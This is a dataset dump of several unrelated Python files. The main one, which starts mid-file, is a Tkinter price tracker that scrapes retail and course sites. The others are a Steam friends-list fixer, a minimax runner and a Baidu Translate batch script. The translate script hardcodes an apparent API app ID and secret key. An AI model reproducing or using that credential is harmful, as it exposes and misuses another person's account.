frame_4.find('span', class_='_35KyD6')\n # flipkart product name\n flipkart_product_name = frame_5.text\n frame_6 = frame_3.find('div', class_='_1uv9Cb')\n # flipkart product price\n flipkart_product_price = frame_6.find(\n 'div', class_='_1vC4OE _3qQ9m1').text\n return flipkart_product_name, flipkart_product_price\n\n################################################################ AMAZON #############################################################################\n\n\ndef amazon_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n # common for both (name and price)\n frame_1_common = soup.find('div', id='centerCol')\n # amazon product price\n frame_3_price = frame_1_common.find('div', id='unifiedPrice_feature_div')\n frame_4_price = frame_3_price.find('div', id='price')\n frame_5_price = frame_4_price.find('table', class_='a-lineitem')\n try:\n frame_6_price = frame_5_price.find('tr', id='priceblock_saleprice_row')\n frame_7_price = frame_6_price.find('td', class_='a-span12')\n frame_8_price = frame_7_price.find('span', id='priceblock_saleprice')\n except:\n pass\n try:\n frame_6_price = frame_5_price.find('tr', id='priceblock_ourprice_row')\n frame_7_price = frame_6_price.find('td', class_='a-span12')\n frame_8_price = frame_7_price.find('span', id='priceblock_ourprice')\n except:\n pass\n amazon_product_price = frame_8_price.text.strip()\n\n # amazon product name\n frame_2_title = frame_1_common.find('div', id='title_feature_div')\n frame_3_title = frame_2_title .find('div', id='titleSection')\n frame_4_title = frame_3_title .find(\n 'h1', class_='a-size-large a-spacing-none')\n frame_5_title = frame_4_title .find('span', id='productTitle')\n amazon_product_name = frame_5_title.text.strip()\n\n return amazon_product_price, amazon_product_name\n\n################################################################ EBAY P #############################################################################\n\n\ndef Ebay_p_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'lxml')\n\n # common for both (name and price)\n main_content = soup.find('div', id='mainContent')\n frame_1_common = main_content.find(\n 'div', class_='product-buy-container product-buy-container-new-ui')\n\n # ebay p product name\n frame_2_name = frame_1_common.find('div', class_='product')\n frame_3_name = frame_2_name.find(\n 'div', class_='product-card-wrapper clearfix')\n frame_4_name = frame_3_name.find(\n 'div', class_='product-info no-product-picture')\n ebay_p_product_name = frame_4_name.h1.text.strip()\n\n # ebay p product price\n for count in range(2, 4):\n try:\n frame_2_price = frame_1_common.find('div', id='center-panel')\n frame_3_price = frame_2_price.find('div', id='hero-item')\n frame_4_price = frame_3_price.find(\n 'div', class_='app-theme-item-wrapper shown')\n frame_5_price = frame_4_price.find('div', class_='item-desc')\n frame_6_price = frame_5_price.find(\n 'div', class_='item-content-wrapper')\n try:\n frame_7_price = frame_6_price.find('div', class_='item-offer')\n except:\n pass\n try:\n frame_8_price = frame_6_price.find(\n 'div', id=f'tab-panel-0-w{count}') # tab-panel-0-w2\n except:\n pass\n try:\n frame_8_price = frame_7_price.find(\n 'div', id=f'tab-panel-0-w{count}') # tab-panel-0-w2\n except:\n pass\n frame_9_price = frame_8_price.find(\n 'div', class_='item-price-logistics-wrapper')\n ebay_p_product_price = frame_9_price.h2.text.strip()\n except:\n pass\n\n return ebay_p_product_name, ebay_p_product_price\n\n################################################################ EBAY ITM #############################################################################\n\n\ndef Ebay_itm_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'lxml')\n\n # common for both (name and price)\n main_content = soup.find('div', id='CenterPanelInternal')\n frame_1_common = main_content.find('div', id='LeftSummaryPanel')\n\n # ebay itm product price\n frame_2_price = frame_1_common.find('div', id='mainContent')\n frame_3_price = frame_2_price.find(\n 'div', class_='c-std vi-ds3cont-box-marpad')\n frame_4_price = frame_3_price.find(\n 'div', class_='actPanel vi-noborder')\n frame_5_price = frame_4_price.find(\n 'div', class_='u-flL w29 vi-price')\n ebay_itm_product_price = frame_5_price.span.text\n\n # ebay itm product name\n frame_2_name = frame_1_common.find('div', class_='vi-swc-lsp')\n frame_3_name = frame_2_name.find('span', id='vi-lkhdr-itmTitl')\n ebay_itm_product_name = frame_3_name.text\n\n return ebay_itm_product_name, ebay_itm_product_price\n\n\n############################################# MERGING BOTH P AND ITM EBAY FUCNTION ####################################################################\n\ndef ebay_finder(URL):\n ebay_len = len('https://www.ebay.com/')\n find_ebay = URL[ebay_len:]\n product_find = URL[ebay_len:].split('/')\n\n # EBAY FOR P PRODUCT\n\n if product_find[0] == 'p':\n ebay_p_product_price, ebay_p_product_title = Ebay_p_detail(URL)\n return ebay_p_product_price, ebay_p_product_title\n\n # ebay for itm product\n\n if product_find[0] == 'itm':\n ebay_itm_product_price, ebay_itm_product_title = Ebay_itm_detail(URL)\n return ebay_itm_product_price, ebay_itm_product_title\n\n################################################################ SNAPDEAL #############################################################################\n\n\ndef snapdeal_detail(URL):\n snapdeal_product_type = {\n \"fashion\": ['pdp-fash-topcenter-inner layout', 'fashionPriceTile row', 'col-xs-18'],\n \"electronics\": ['pdp-elec-topcenter-inner layout', 'elecPriceTile buyNowBlock row', 'col-xs-22'],\n\n }\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('section', id='overviewBlk')\n frame_1_common = main_content.find(\n 'div', class_='product-detail clearfix col-xs-24 reset-padding favDp')\n frame_2_common = frame_1_common.find(\n 'div', class_='col-xs-14 right-card-zoom reset-padding')\n frame_3_common = frame_2_common.find(\n 'div', class_='pdp-comp comp-product-description clearfix')\n for i in snapdeal_product_type:\n try:\n frame_4_common = frame_3_common.find(\n 'div', class_=snapdeal_product_type[i][0]) # pdp-elec-topcenter-inner layout # pdp-fash-topcenter-inner layout\n\n # snapdeal product price\n\n frame_5_price = frame_4_common.find(\n 'div', class_='container-fluid reset-padding')\n frame_6_price = frame_5_price.find(\n 'div', class_=snapdeal_product_type[i][1]) # elecPriceTile buyNowBlock row # fashionPriceTile row\n frame_7_price = frame_6_price.find(\n 'div', class_='row reset-margin')\n frame_8_price = frame_7_price.find(\n 'div', class_='col-xs-14 reset-padding padL8')\n frame_9_price = frame_8_price.find(\n 'div', class_='disp-table')\n frame_10_price = frame_9_price.find(\n 'div', class_='pdp-e-i-PAY-r disp-table-cell lfloat')\n snapdeal_product_price = frame_10_price.span.text.strip()\n\n # snapdeal product name\n\n frame_5_name = frame_4_common.find(\n 'div', class_='row')\n frame_6_name = frame_5_name.find(\n 'div', class_=snapdeal_product_type[i][2]) # col-xs-22 # col-xs-18\n snapdeal_product_name = frame_6_name.h1.text.strip()\n\n return snapdeal_product_name, snapdeal_product_price\n except:\n pass\n\n################################################################ SHOPCLUES #############################################################################\n\n\ndef shopclues_products(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('div', class_='container')\n frame_1_common = main_content.find('div', class_='wrapper maxStWrap')\n frame_2_common = frame_1_common.find('div', id='main_data')\n frame_3_common = frame_2_common.find('div', class_='shd_box')\n frame_4_common = frame_3_common.find('div', class_='prd_mid_info')\n\n # shopclues product price\n\n frame_5_price = frame_4_common.find('div', class_='price')\n frame_6_price = frame_5_price.find('span', class_='f_price')\n shopclues_product_price = frame_6_price.text.strip()\n\n # shopclues product name\n shopclues_product_name = frame_4_common.h1.text.strip()\n return shopclues_product_name, shopclues_product_price\n\n\n################################################################ EDX #############################################################################\n\ndef Edx_Course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('main', id='main-content')\n frame_1_common = main_content.find('div', class_='course-info-content')\n\n # edx course price\n\n frame_2_price = frame_1_common.find(\n 'div', class_='row no-gutters main-content')\n frame_3_price = frame_2_price.find(\n 'div', class_='col-lg-4 order-lg-2 offset-lg-1')\n frame_4_price = frame_3_price.find(\n 'div', class_='container course-side-area')\n frame_5_price = frame_4_price.find(\n 'ul', class_='list-group list-group-flush w-100')\n frames_6_price = frame_5_price.find('p', class_='m-0')\n edx_course_price = frames_6_price.text.strip()\n\n # edx course title\n\n frame_2_title = frame_1_common.find(\n 'header', class_='course-header push-away-from-absolute-header mb-4 row')\n frame_3_title = frame_2_title.find('div', id='course-header')\n frame_4_title = frame_3_title.find('div', class_='row no-gutters w-100')\n frame_5_title = frame_4_title.find(\n 'h1', class_='course-intro-heading mb-2')\n edx_course_title = frame_5_title.text.strip()\n\n return edx_course_price, edx_course_title\n\n################################################################ EDX COURSE OTHER TYPE ###############################################################\n\n\ndef Edx_other_type_course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('main', id='main-content')\n\n # edx other course type price\n\n frame_1_price = main_content.find(\n 'div', class_='gradient-wrapper program-body')\n frame_2_price = frame_1_price.find(\n 'div', class_='container')\n frame_3_price = frame_2_price.find(\n 'div', class_='container-fluid program-section')\n frame_4_price = frame_3_price.find('div', class_='row')\n frame_5_price = frame_4_price.find('div', class_='flex-column')\n frame_6_price = frame_5_price.find('div', class_='main d-flex flex-wrap')\n edx_other_type_course_price = frame_6_price.text.strip()\n\n # edx other course type title\n\n frame_1_title = main_content.find('div', class_='data-bar shadow')\n for count in range(1, 3):\n try:\n frame_2_title = frame_1_title.find(\n 'div', class_=f'data-bar-content partner-count-{count}') # data-bar-content partner-count-2\n frame_3_title = frame_2_title.find(\n 'div', class_='container-fluid')\n frame_4_title = frame_3_title.find(\n 'div', class_='row')\n frame_5_title = frame_4_title.find(\n 'div', class_='program')\n frame_6_title = frame_5_title.find(\n 'div', class_='type')\n frame_7_title = frame_6_title.find(\n 'div', class_='title')\n edx_other_type_course_title = frame_7_title.text.strip()\n except:\n pass\n # the course title is in french language , convert into english\n\n return edx_other_type_course_price, edx_other_type_course_title\n\n\n######################################################## MERGING BOTH EDX FUCNTION ###################################################################\n\ndef edx_finder(URL):\n edx_len = len('https://www.edx.org/')\n find_edx = URL[edx_len:]\n course_find = URL[edx_len:].split('/')\n\n if course_find[0] == 'course':\n edx_course_price, edx_course_title = Edx_Course(URL)\n return edx_course_price, edx_course_title\n\n # edx for same other type\n\n if course_find[0] != 'course':\n edx_other_type_course_price, edx_other_type_course_title = Edx_other_type_course(\n URL)\n return edx_other_type_course_price, edx_other_type_course_title\n\n################################################################ UDEMY ################################################################################\n\n\ndef Udemy_course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('div', class_='main-content')\n frame_1_common = main_content.find(\n 'div', class_='full-width full-width--streamer streamer--complete')\n frame_2_common = frame_1_common.find('div', class_='container')\n\n # udemy course price\n\n frame_3_price = frame_2_common.find(\n 'div', class_='js-right-col__content right-col__content')\n frame_4_price = frame_3_price.find(\n 'div', class_='right-col__module')\n frame_5_price = frame_4_price.find(\n 'div', class_='right-col__inner')\n frame_6_price = frame_5_price.find(\n 'div', 'ud-component--clp--price-text')\n frame_7_price = frame_6_price.find(\n 'div', 'price-text')\n frame_8_price = frame_7_price.find(\n 'span', 'price-text__current')\n udemy_course_price = frame_8_price.text.strip()\n\n # udemy course title\n\n frame_3_title = frame_2_common.find('div', class_='clp-lead')\n frame_4_title = frame_3_title.find('div', class_='clp-component-render')\n frame_5_title = frame_4_title.find('h1')\n udemy_course_name = frame_5_title.text.strip()\n\n return udemy_course_name, udemy_course_price\n\n# Threading\n\n\ndef product_detail_threading():\n print(\"start\")\n t1 = Thread(target=product_detail)\n t1.start()\n print(\"done\")\n\n########################################################## COMBINING ALL FUNCTION #################################################################\n\n\ndef product_detail():\n url = enter_url.get(\"1.0\", \"end\").strip()\n\n # Amazon\n\n if radiobutton_variable.get() == \"1\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n amazon_product_price, amazon_product_name = amazon_detail(url)\n product_name_label.update()\n product_name_variable.set(amazon_product_name)\n current_price_label.update()\n current_price_variable.set(amazon_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Flipkart\n\n if radiobutton_variable.get() == \"2\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n flipkart_product_name, flipkart_product_price = flipkart_detail(\n url)\n product_name_label.update()\n product_name_variable.set(flipkart_product_name)\n current_price_label.update()\n current_price_variable.set(flipkart_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Edx\n\n if radiobutton_variable.get() == \"3\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n edx_price, edx_title = edx_finder(url)\n product_name_label.update()\n product_name_variable.set(edx_title)\n current_price_label.update()\n current_price_variable.set(edx_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Udemy\n\n if radiobutton_variable.get() == \"4\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n udemy_course_name, udemy_course_price = Udemy_course(url)\n product_name_label.update()\n product_name_variable.set(udemy_course_name)\n current_price_label.update()\n current_price_variable.set(udemy_course_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n status_variable.set(\"Try Again....\")\n\n # Ebay\n\n if radiobutton_variable.get() == \"5\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n eday_product_name, ebay_product_price = ebay_finder(url)\n product_name_label.update()\n product_name_variable.set(eday_product_name)\n current_price_label.update()\n current_price_variable.set(ebay_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Snapdeal\n\n if radiobutton_variable.get() == \"6\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n snapdeal_product_name, snapdeal_product_price = snapdeal_detail(\n url)\n product_name_label.update()\n product_name_variable.set(snapdeal_product_name)\n current_price_label.update()\n current_price_variable.set(snapdeal_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Shopclues\n\n if radiobutton_variable.get() == \"7\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n shopclues_product_name, shopclues_product_price = shopclues_products(\n url)\n product_name_label.update()\n product_name_variable.set(shopclues_product_name)\n current_price_label.update()\n current_price_variable.set(shopclues_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n\ndef all_details():\n if radiobutton_variable.get() == \"1\":\n company_name = \"Amazon\"\n if radiobutton_variable.get() == \"2\":\n company_name = \"Flipkart\"\n if radiobutton_variable.get() == \"3\":\n company_name = \"Edx\"\n if radiobutton_variable.get() == \"4\":\n company_name = \"Udemy\"\n if radiobutton_variable.get() == \"5\":\n company_name = \"Ebay\"\n if radiobutton_variable.get() == \"6\":\n company_name = \"Snapdeal\"\n if radiobutton_variable.get() == \"6\":\n company_name = \"Shopclues\"\n print(company_name)\n print(product_name_label.cget(\"text\"))\n print(current_price_label.cget(\"text\"))\n print(set_price.get())\n print(set_time.get())\n print(initial_time_type_variable.get())\n\n# increment time\n\n\ndef increment_value():\n if int(set_time.get()) < 0:\n initial_time.set(int(0))\n set_time.update()\n else:\n initial_time.set(int(set_time.get())+1)\n set_time.update()\n\n# decrement time\n\n\ndef decrement_value():\n if int(set_time.get()) < 0:\n initial_time.set(int(0))\n set_time.update()\n if int(set_time.get()) > 0:\n initial_time.set(int(set_time.get())-1)\n set_time.update()\n\n# Main program starts\n\n\nif __name__ == \"__main__\":\n\n # price drop heading\n price_drop_alert = Label(root, text=\"Price Drop Alert\",\n font=(\"Times\", \"26\", \"bold italic\"))\n price_drop_alert.place(x=10, y=5)\n\n # url\n enter_url_label = Label(root, text=\"Enter URL :\",\n font=(\"Times\", \"20\"))\n enter_url_label.place(x=60, y=67)\n enter_url = Text(root, width=40, height=3)\n enter_url.place(x=200, y=60)\n\n # company\n company_label = Label(root, text=\"Company :\",\n font=(\"Times\", \"20\"))\n company_label.place(x=67, y=120)\n\n # radio buttons\n radiobutton_variable = StringVar()\n radiobutton_variable.set(\"1\")\n Radiobutton1 = Radiobutton(text=\"Amazon\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=1)\n Radiobutton1.place(x=200, y=113)\n Radiobutton2 = Radiobutton(text=\"Flipkart\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=2)\n Radiobutton2.place(x=270, y=113)\n Radiobutton3 = Radiobutton(text=\"Edx\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=3)\n Radiobutton3.place(x=340, y=113)\n Radiobutton4 = Radiobutton(text=\"Udemy\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=4)\n Radiobutton4.place(x=385, y=113)\n Radiobutton5 = Radiobutton(text=\"Ebay\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=5)\n Radiobutton5.place(x=470, y=113)\n Radiobutton6 = Radiobutton(text=\"Snapdeal\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=6)\n Radiobutton6.place(x=280, y=133)\n Radiobutton6 = Radiobutton(text=\"Shopclues\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=7)\n Radiobutton6.place(x=200, y=133)\n\n # search button\n search = Button(root, text=\"Search Product\",\n font=(\"Times\", \"20\", \"bold italic\"), command=product_detail_threading)\n search.place(x=200, y=160)\n\n # product name\n product_name = Label(root, text=\"Product name :\", font=(\"Times\", \"20\"))\n product_name.place(x=60, y=223)\n\n product_name_variable = StringVar()\n product_name_variable.set(\"\")\n product_name_label = Label(\n root, textvariable=product_name_variable, fg='red',\n width=50, height=3, anchor=\"nw\", wraplength=300)\n product_name_label.place(x=230, y=231)\n\n # current price\n current_price = Label(root, text=\"Current price :\", font=(\"Times\", \"20\"))\n current_price.place(x=60, y=275)\n\n current_price_variable = StringVar()\n current_price_variable.set(\"\")\n current_price_label = Label(\n root, textvariable=current_price_variable, fg='red',\n width=20, anchor=\"nw\", wraplength=300)\n current_price_label.place(x=230, y=285)\n\n # if above details are not correct\n detial_not_correct_label = Label(\n root, text=''' If Above Details are not correct , \n Please send the searched link on this email\n \"kumar.abhishekgoyal@gmail.com\"''',\n font=(\"Times\", \"15\"), fg='red')\n detial_not_correct_label.place(x=80, y=330)\n\n # set price\n set_price_label = Label(root, text=\"Set Price :\", font=(\"Times\", \"20\"))\n set_price_label.place(x=60, y=410)\n set_price = Entry(root, font=(\"Times\", \"20\"))\n set_price.place(x=180, y=410)\n\n # set time\n initial_time = IntVar()\n initial_time.set(1)\n set_time_label = Label(root, text=\"Set Time :\", font=(\"Times\", \"20\"))\n set_time_label.place(x=60, y=460)\n set_time = Entry(root, textvariable=initial_time, font=(\"Times\", \"20\"),\n width=3)\n set_time.place(x=180, y=460)\n\n # increment time\n increment_image = 'images/increment_triangle.jpg'\n increment_image_icon = ImageTk.PhotoImage(Image.open(increment_image))\n increment_button = Button(root, command=increment_value)\n increment_button.place(x=235, y=462)\n increment_button.config(image=increment_image_icon)\n\n # decrement time\n decrement_image = 'images/decrement_triangle.jpg'\n decrement_image_icon = ImageTk.PhotoImage(Image.open(decrement_image))\n decrement_button = Button(root, command=decrement_value)\n decrement_button.place(x=235, y=478)\n decrement_button.config(image=decrement_image_icon)\n\n # dropdown time type\n initial_time_type_variable = StringVar()\n initial_time_type_variable.set('Days')\n initial_time_type_values = {'Minutes', 'Hours',\n 'Days', 'Weeks', 'Months', 'Years'}\n initial_time_type_drp = OptionMenu(\n root, initial_time_type_variable, *initial_time_type_values)\n initial_time_type_drp.place(x=260, y=460)\n\n # # save button\n save_button = Button(root, text=\"Save\",\n font=(\"Times\", \"20\", \"bold italic\"), command=all_details)\n save_button.place(x=300, y=500)\n\n # status\n status_variable = StringVar()\n status_variable.set(\"Ready\")\n status_label = Label(\n root, textvariable=status_variable, anchor=\"nw\", fg='red', relief=SUNKEN)\n status_label.pack(fill=X, side=BOTTOM)\n\n root.configure()\n root.mainloop()\n","repo_name":"abhishekgoyal-a11y/Price-tracker-app","sub_path":"pricetracker_app.py","file_name":"pricetracker_app.py","file_ext":"py","file_size_in_byte":27013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34193626502","text":"#!/usr/bin/env python3\n\nimport glob\nimport json\nimport sys\nfrom tp_utils import *\n\n\nfriends_folder = 'friends/'\nfixed_folder = 'fixed_friends/'\nachdir = 'achievements/'\nsummarydir = 'summaries/'\nstatsdir = 'stats/'\nusers = set()\nvisited = set()\nfriends = {}\n\nfor user in glob.glob(achdir + '*.json'):\n users.add(int(user[len(achdir):-5]))\n\nfor user in glob.glob(statsdir + '*.json'):\n users.add(int(user[len(statsdir):-5]))\n\nfor user in glob.glob(summarydir + '*.json'):\n users.add(int(user[len(summarydir):-5]))\n\nfor uid in users:\n\twith open(friends_folder + '/{0}.json'.format(uid), 'r') as ufile:\n\t\tujson = json.load(ufile)\n\t\tufile.close()\n\tvisited.add(uid)\n\tfriends[uid] = {}\n\tif len(ujson) is not 0:\n\t\tfor friend in ujson['friendslist']['friends']:\n\t\t\tfriends[uid][int(friend['steamid'])] = int(friend['friend_since'])\n\nfor uid in friends:\n\tfriends[uid] = { k: friends[uid][k] for k in friends[uid] if k in visited }\n\nfor uid in friends:\n\tfor fid in friends[uid]:\n\t\tfriends[fid][uid] = friends[uid][fid]\n\nfor uid in friends:\n\twith open(fixed_folder + '/{0}.json'.format(uid), 'w') as ffile:\n\t\tffile.write(json.dumps({ 'friendslist': { 'friends': [ { 'steamid': k, 'relationship': 'friend', 'friend_since': friends[uid][k] } for k in friends[uid] ] } }))\n\t\tffile.close()\n","repo_name":"marcoffee/IBD-TP2","sub_path":"codes/user_fix.py","file_name":"user_fix.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14372103332","text":"\"\"\"\nRunner Program to simulate pruning of a minmax tree\n\nDate: August 4th, 2021\nAuthors: Keval Varia, Muskan Israni\nStudent ID: 017834282, 017537908\nClass: CECS 451- Artificial Intelligence\n\"\"\"\n\nfrom Tree import *\n\n\ndef main():\n # variable declaration\n small_tree = Tree()\n big_tree = Tree()\n inputFile1 = \"tree1.txt\"\n inputFile2 = \"tree2.txt\"\n\n # read input file into a tree\n print(\"\\nPart I: Import data from CSV file to Tree structure\\n\")\n small_tree.populateTree(inputFile1)\n big_tree.populateTree(inputFile2)\n\n # part 2 - perform a minimax algorithm (w/o alpha-beta) on both trees generated above\n small_tree.minimaxSimple(small_tree.root, small_tree.get_depth())\n big_tree.minimaxSimple(big_tree.root, big_tree.get_depth())\n\n # display the results of the minmax algorithm run in the step above for both trees\n print(\"Part II - Small File: Minimax:\")\n small_tree.DFS_traversal()\n print(\"\\nPart II - Big File: Minimax:\")\n big_tree.DFS_traversal()\n\n # part 3 - perform a minimax algorithm (w alpha-beta pruning) on both trees generated above\n print(\"\\n\\nPart III - Small File - Minimax w/ Alpha-Beta:\")\n small_tree.minimaxComplex(small_tree.root, small_tree.get_depth())\n print(\"\\nPart III - Big File - Minimax w/ Alpha-Beta:\")\n big_tree.minimaxComplex(big_tree.root, big_tree.get_depth())\n\n # display the results of the minmax algorithm run in the step above for both trees\n for item in small_tree.get_nodes():\n node = small_tree.nodes[item]\n print(node.get_id(), \"[\", node.get_weight(), \"]\", node.get_pruned())\n for item in big_tree.get_nodes():\n node = big_tree.nodes[item]\n print(node.get_id(), \"[\", node.get_weight(), \"]\", node.get_pruned())\n\n\n# auto-run main method at program launch/run\nif __name__ == '__main__':\n main()\n","repo_name":"muskaanisrani/CECS451-Artificial-Intelligence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27044004779","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n调用「百度翻译 API」实现英汉互译及多语言翻译\n@Author: Newyee\n@Python: 3.6.5\n@Create: 2019-04-18\n\"\"\"\n# 导入相关模块\nimport hashlib\nimport random\nimport requests\nimport time\nimport os\n\n# 你的APP ID\nappID = '20210107000665791'\n# 你的密钥\nsecretKey = 'Mhfzq9mjZ9FtKa7fZY3u'\n# 百度翻译 API 的 HTTP 接口\napiURL = 'http://api.fanyi.baidu.com/api/trans/vip/translate'\n\n\ndef baiduAPI_translate(query_str, to_lang):\n '''\n 传入待翻译的字符串和目标语言类型,请求 apiURL,自动检测传入的语言类型获得翻译结果\n :param query_str: 待翻译的字符串\n :param to_lang: 目标语言类型\n :return: 翻译结果字典\n '''\n # 生成随机的 salt 值\n salt = str(random.randint(32768, 65536))\n # 准备计算 sign 值需要的字符串\n pre_sign = appID + query_str + salt + secretKey\n # 计算 md5 生成 sign\n sign = hashlib.md5(pre_sign.encode()).hexdigest()\n # 请求 apiURL 所有需要的参数\n params = {\n 'q': query_str,\n 'from': 'auto',\n 'to': to_lang,\n 'appid': appID,\n 'salt':salt,\n 'sign': sign\n }\n try:\n # 直接将 params 和 apiURL 一起传入 requests.get() 函数\n response = requests.get(apiURL, params=params)\n # 获取返回的 json 数据\n result_dict = response.json()\n # 得到的结果正常则 return\n if 'trans_result' in result_dict:\n return result_dict\n else:\n print('Some errors occured:\\n', result_dict)\n except Exception as e:\n print('Some errors occured: ', e)\n\n\ndef baiduAPI_translate_main(query_str, dst_lang=''):\n '''\n 解析翻译结果后输出,默认实现英汉互译\n :param query_str: 待翻译的字符串,必填\n :param dst_lang: 目标语言类型,可缺省\n :return: 翻译后的字符串\n '''\n if dst_lang:\n # 指定了目标语言类型,则直接翻译成指定语言\n result_dict = baiduAPI_translate(query_str, dst_lang)\n else:\n # 未指定目标语言类型,则默认进行英汉互译\n result_dict = baiduAPI_translate(query_str, 'zh')\n if result_dict['from'] == 'zh':\n result_dict = baiduAPI_translate(query_str, 'en')\n # 提取翻译结果字符串,并输出返回\n try:\n dst = result_dict['trans_result'][0]['dst']\n except Exception as e:\n with open(\".\\\\notTranslate.txt\",\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(query_str)\n file_handle.write('\\n')\n return None\n\n # print('{}: {} -> {}: {}'.format(result_dict['from'], query_str, result_dict['to'], dst))\n return dst\n\ndef enToChina(enText):\n chText = baiduAPI_translate_main(enText)\n time.sleep(1)\n return chText\n\nif __name__ == '__main__':\n preDataDir = './extractData'\n for file in os.listdir(preDataDir):\n file_name = preDataDir + \"\\\\\" + file\n if 'question' not in file_name:\n continue\n if 'train' not in file_name:\n continue\n print(\"处理:\"+file_name)\n filein = open(file_name, \"r\",encoding='UTF-8')\n\n codeFileName = ''\n if 'train' in file_name:\n codeFileName = preDataDir + \"\\\\\" + 'answer_conala-train.json.txt'\n else:\n codeFileName = preDataDir + \"\\\\\" + 'answer_conala-test.json.txt'\n fileCode = open(codeFileName, \"r\",encoding='UTF-8')\n\n translateList = []\n resultList = []\n codeList = []\n for line in filein.readlines():\n # print(line)\n line = line.replace('[wrap]','\\n').replace('[tab]','\\t').replace('[enter]','\\r')\n translateList.append(line)\n for line in fileCode.readlines():\n # print(line)\n codeList.append(line)\n if len(codeList)!= len(translateList):\n print(\"error:translateList 与 codeList 长度不同!\")\n else:\n\n for index in range(0,len(translateList)):\n # print(translateList[index])\n chText = enToChina(str(translateList[index]))\n # resultList.append(chText)\n if chText:\n with open(\".\\\\chData\\\\ch_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(chText)\n file_handle.write('\\n')\n with open(\".\\\\chData\\\\pre_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(translateList[index])\n file_handle.write('\\n')\n\n with open(\".\\\\chData\\\\code_new_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n file_handle.write(codeList[index])\n file_handle.write('\\n')\n print(\"结束处理:\"+file_name)\n # 保存结果\n # if len(resultList) > 0:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format('question_conala-train.json.txt'),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # preDataDir = './extractData'\n # for file in os.listdir(preDataDir):\n # file_name = preDataDir + \"\\\\\" + file\n # if 'question' not in file_name:\n # continue\n # filein = open(file_name, \"r\",encoding='UTF-8')\n #\n # translateList = []\n # resultList = []\n # for line in filein.readlines():\n # print(line)\n # translateList.append(line)\n # for item in translateList:\n # chText = enToChina(str(item))\n # resultList.append(chText)\n # if len(resultList) > 1000:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # resultList.clear()\n # # 保存结果\n # if len(resultList) > 0:\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # with open(\".\\\\chData\\\\question_ch_{0}.txt\".format(file),\"a\",encoding=\"utf-8\") as file_handle: # .txt可以不自己新建,代码会自动新建\n # for item in resultList:\n # file_handle.write(item)\n # file_handle.write('\\n')\n # baiduAPI_translate_main('This is English.')\n # 